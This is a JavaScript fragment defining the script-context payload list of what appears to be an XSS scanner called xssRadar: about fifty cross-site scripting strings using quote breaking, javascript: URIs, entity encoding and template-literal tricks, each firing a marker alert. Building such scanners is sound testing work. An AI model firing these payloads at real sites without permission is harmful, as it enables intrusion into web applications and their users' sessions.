xssRadar.scanner.payloads.script = [
  '\';alert({id});',
  'alert({id});',
  "';alert({id})//",
  "\";alert({id})//",
  "'-alert({id})-'",
  "'-alert({id})//",
  "\\'-alert({id})//",
  "%27};alert({id});%0Afoobar={foo:bar%27",
  "'};alert`{id}`;var a={a:'",
  "\"%0a%00/**/onload=alert({id})>",
  "if(1)alert({id})}{",
  "javaSCRIPT&colon;alert({id})",
  "javascript&#00058;alert({id})",
  "javascript&#00058;alert({id})",
  "\"javascript:alert({id});\",",
  ";javascript:alert({id});",
  ";})javascript:alert({id});",
  "javascript:alert({id});",
  "javascript:alert({id})//",
  "location=javascript:alert({id});.",
  "\nalert({id})",
  "navigateToURL(new URLRequest(\"Javascript: document.write(\"<script>alert({id})</scr\"+\"ipt>\")\"),\"_self\")",
  "new XMLHttpRequest().open(\"GET\", \"data:text/html,<svg onload=alert({id})></svg>\", false);",
  "onload=alert({id})//",
  ";alert({id})//”;alert({id})//”;alert({id})//–></SCRIPT>”>’><SCRIPT>alert({id})</SCRIPT>",
  "\"!=alert({id})!=\"",
  "\"*alert({id})*\"",
  "\"/alert({id})/\"",
  "\"<<alert({id})<<\"",
  "\"<=alert({id})<=\"",
  "\"<alert({id})<\"",
  "\"===alert({id})===\"",
  "\"==alert({id})==\"",
  "\">=alert({id})>=\"",
  "\">>>alert({id})>>>\"",
  "\">>alert({id})>>\"",
  "\">alert({id})>\"",
  "\"?alert({id}):\"",
  "\"^alert({id})^\"",
  "\"|alert({id})|\"",
  "\"||alert({id})||\"",
  "alert({id})",
  "j&NewLine;a&NewLine;vas&NewLine;cript:alert({id});",
  "alert({id})-eval(JSON.parse(name).input)",
  "alert`1`; var something = `abc${alert({id})}def`; ``.constructor.constructor`alert\`1\````;",
  "JaVAscRIPT:alert({id})",
]